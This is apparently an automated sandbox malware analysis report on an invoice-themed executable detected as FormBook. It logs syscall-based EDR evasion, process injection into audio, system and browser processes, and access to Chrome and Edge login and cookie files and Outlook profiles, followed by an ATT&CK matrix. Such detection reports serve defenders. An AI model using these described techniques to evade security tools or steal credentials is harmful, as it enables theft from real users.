                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990835 mov eax, dword ptr fs:[00000030h]4_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C870 mov eax, dword ptr fs:[00000030h]4_2_0196C870
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A8BBE mov eax, dword ptr fs:[00000030h]4_2_019A8BBE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A8BBE mov eax, dword ptr fs:[00000030h]4_2_019A8BBE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A8BBE mov eax, dword ptr fs:[00000030h]4_2_019A8BBE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A8BBE mov eax, dword ptr fs:[00000030h]4_2_019A8BBE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01908BD1 mov eax, dword ptr fs:[00000030h]4_2_01908BD1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01908BD1 mov eax, dword ptr fs:[00000030h]4_2_01908BD1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01986BDE mov ebx, dword ptr fs:[00000030h]4_2_01986BDE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01986BDE mov eax, dword ptr fs:[00000030h]4_2_01986BDE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DEBC0 mov eax, dword ptr fs:[00000030h]4_2_018DEBC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964BC0 mov eax, dword ptr fs:[00000030h]4_2_01964BC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964BC0 mov eax, dword ptr fs:[00000030h]4_2_01964BC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964BC0 mov eax, dword ptr fs:[00000030h]4_2_01964BC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964BC0 mov eax, dword ptr fs:[00000030h]4_2_01964BC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4BE0 mov eax, dword ptr fs:[00000030h]4_2_019B4BE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190EB1C mov eax, dword ptr fs:[00000030h]4_2_0190EB1C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DCB1E mov eax, dword ptr fs:[00000030h]4_2_018DCB1E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8B10 mov eax, dword ptr fs:[00000030h]4_2_018E8B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8B10 mov eax, dword ptr fs:[00000030h]4_2_018E8B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8B10 mov eax, dword ptr fs:[00000030h]4_2_018E8B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0B10 mov eax, dword ptr fs:[00000030h]4_2_018F0B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0B10 mov eax, dword ptr fs:[00000030h]4_2_018F0B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0B10 mov eax, dword ptr fs:[00000030h]4_2_018F0B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0B10 mov eax, dword ptr fs:[00000030h]4_2_018F0B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191CB20 mov eax, dword ptr fs:[00000030h]4_2_0191CB20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196CB20 mov eax, dword ptr fs:[00000030h]4_2_0196CB20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196CB20 mov eax, dword ptr fs:[00000030h]4_2_0196CB20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196CB20 mov eax, dword ptr fs:[00000030h]4_2_0196CB20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01914B79 mov eax, dword ptr fs:[00000030h]4_2_01914B79
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01996B77 mov eax, dword ptr fs:[00000030h]4_2_01996B77
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4B67 mov eax, dword ptr fs:[00000030h]4_2_019B4B67
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAB70 mov eax, dword ptr fs:[00000030h]4_2_018EAB70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAB70 mov eax, dword ptr fs:[00000030h]4_2_018EAB70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAB70 mov eax, dword ptr fs:[00000030h]4_2_018EAB70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAB70 mov eax, dword ptr fs:[00000030h]4_2_018EAB70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAB70 mov eax, dword ptr fs:[00000030h]4_2_018EAB70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAB70 mov eax, dword ptr fs:[00000030h]4_2_018EAB70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6B70 mov eax, dword ptr fs:[00000030h]4_2_018E6B70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6B70 mov eax, dword ptr fs:[00000030h]4_2_018E6B70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6B70 mov eax, dword ptr fs:[00000030h]4_2_018E6B70
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01996A80 mov eax, dword ptr fs:[00000030h]4_2_01996A80
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0ACE mov eax, dword ptr fs:[00000030h]4_2_018F0ACE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0ACE mov eax, dword ptr fs:[00000030h]4_2_018F0ACE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01984AC2 mov eax, dword ptr fs:[00000030h]4_2_01984AC2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0AED mov eax, dword ptr fs:[00000030h]4_2_018E0AED
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0AED mov eax, dword ptr fs:[00000030h]4_2_018E0AED
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0AED mov eax, dword ptr fs:[00000030h]4_2_018E0AED
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960AFF mov eax, dword ptr fs:[00000030h]4_2_01960AFF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960AFF mov eax, dword ptr fs:[00000030h]4_2_01960AFF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960AFF mov eax, dword ptr fs:[00000030h]4_2_01960AFF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4AE8 mov eax, dword ptr fs:[00000030h]4_2_019B4AE8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01980AE0 mov eax, dword ptr fs:[00000030h]4_2_01980AE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01982AE0 mov eax, dword ptr fs:[00000030h]4_2_01982AE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01982AE0 mov eax, dword ptr fs:[00000030h]4_2_01982AE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01900AEB mov eax, dword ptr fs:[00000030h]4_2_01900AEB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01900AEB mov eax, dword ptr fs:[00000030h]4_2_01900AEB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01900AEB mov eax, dword ptr fs:[00000030h]4_2_01900AEB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191AA0E mov eax, dword ptr fs:[00000030h]4_2_0191AA0E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191AA0E mov eax, dword ptr fs:[00000030h]4_2_0191AA0E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964A57 mov eax, dword ptr fs:[00000030h]4_2_01964A57
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964A57 mov eax, dword ptr fs:[00000030h]4_2_01964A57
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190EA40 mov eax, dword ptr fs:[00000030h]4_2_0190EA40
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190EA40 mov eax, dword ptr fs:[00000030h]4_2_0190EA40
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0197AA40 mov eax, dword ptr fs:[00000030h]4_2_0197AA40
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0197AA40 mov eax, dword ptr fs:[00000030h]4_2_0197AA40
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DCD8A mov eax, dword ptr fs:[00000030h]4_2_018DCD8A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DCD8A mov eax, dword ptr fs:[00000030h]4_2_018DCD8A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6D91 mov eax, dword ptr fs:[00000030h]4_2_018E6D91
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D6DA6 mov eax, dword ptr fs:[00000030h]4_2_018D6DA6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01912DBC mov eax, dword ptr fs:[00000030h]4_2_01912DBC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01912DBC mov ecx, dword ptr fs:[00000030h]4_2_01912DBC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4DA7 mov eax, dword ptr fs:[00000030h]4_2_019B4DA7
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D8DCD mov eax, dword ptr fs:[00000030h]4_2_018D8DCD
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0199ADD6 mov eax, dword ptr fs:[00000030h]4_2_0199ADD6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0199ADD6 mov eax, dword ptr fs:[00000030h]4_2_0199ADD6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019ACDEB mov eax, dword ptr fs:[00000030h]4_2_019ACDEB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019ACDEB mov eax, dword ptr fs:[00000030h]4_2_019ACDEB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DEDFA mov eax, dword ptr fs:[00000030h]4_2_018DEDFA
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190CD10 mov eax, dword ptr fs:[00000030h]4_2_0190CD10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190CD10 mov ecx, dword ptr fs:[00000030h]4_2_0190CD10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD00 mov eax, dword ptr fs:[00000030h]4_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD00 mov eax, dword ptr fs:[00000030h]4_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD00 mov eax, dword ptr fs:[00000030h]4_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD00 mov eax, dword ptr fs:[00000030h]4_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD00 mov eax, dword ptr fs:[00000030h]4_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD00 mov eax, dword ptr fs:[00000030h]4_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01900D01 mov eax, dword ptr fs:[00000030h]4_2_01900D01
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196CD00 mov eax, dword ptr fs:[00000030h]4_2_0196CD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196CD00 mov eax, dword ptr fs:[00000030h]4_2_0196CD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01978D0A mov eax, dword ptr fs:[00000030h]4_2_01978D0A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov ecx, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190AD20 mov eax, dword ptr fs:[00000030h]4_2_0190AD20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990D24 mov eax, dword ptr fs:[00000030h]4_2_01990D24
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990D24 mov eax, dword ptr fs:[00000030h]4_2_01990D24
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990D24 mov eax, dword ptr fs:[00000030h]4_2_01990D24
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990D24 mov eax, dword ptr fs:[00000030h]4_2_01990D24
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4D4B mov eax, dword ptr fs:[00000030h]4_2_019B4D4B
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Users\user\Desktop\attached invoice.exeNtSuspendThread: Indirect: 0x18339D9Jump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeNtSetContextThread: Indirect: 0x18336B9Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x46D3F6EJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x7C6286Jump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeNtResumeThread: Indirect: 0x1833CF9Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x7C24FAJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x7B99E2Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7C26DF
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x46D41A5Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7BB41BJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x7BA5E2Jump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeNtClose: Indirect: 0x182F542
                Source: C:\Users\user\Desktop\attached invoice.exeNtQueueApcThread: Indirect: 0x182F4BDJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x7B918BJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x46D4134Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7C25A9Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x7BB356Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7C3AD4Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x46DBD9BJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7C2651Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFBB1022651Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7BB44AJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x7BB48EJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x7BAD4FJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7C245EJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\attached invoice.exeMemory written: C:\Users\user\Desktop\attached invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\attached invoice.exeThread register set: target process: 5368Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 5368Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 7184Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\attached invoice.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess created: C:\Users\user\Desktop\attached invoice.exe "C:\Users\user\Desktop\attached invoice.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RAVCpl64.exe, 00000005.00000000.811668061941.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816283252032.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 00000005.00000000.811668061941.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816283252032.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RAVCpl64.exe, 00000005.00000000.811668061941.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816283252032.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: kProgram Manager
                Source: RAVCpl64.exe, 00000005.00000000.811668061941.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816283252032.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\attached invoice.exeQueries volume information: C:\Users\user\Desktop\attached invoice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.815527565060.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.815527779212.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811798316588.0000000006CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.815527565060.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.815527779212.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811798316588.0000000006CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Software Packing                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
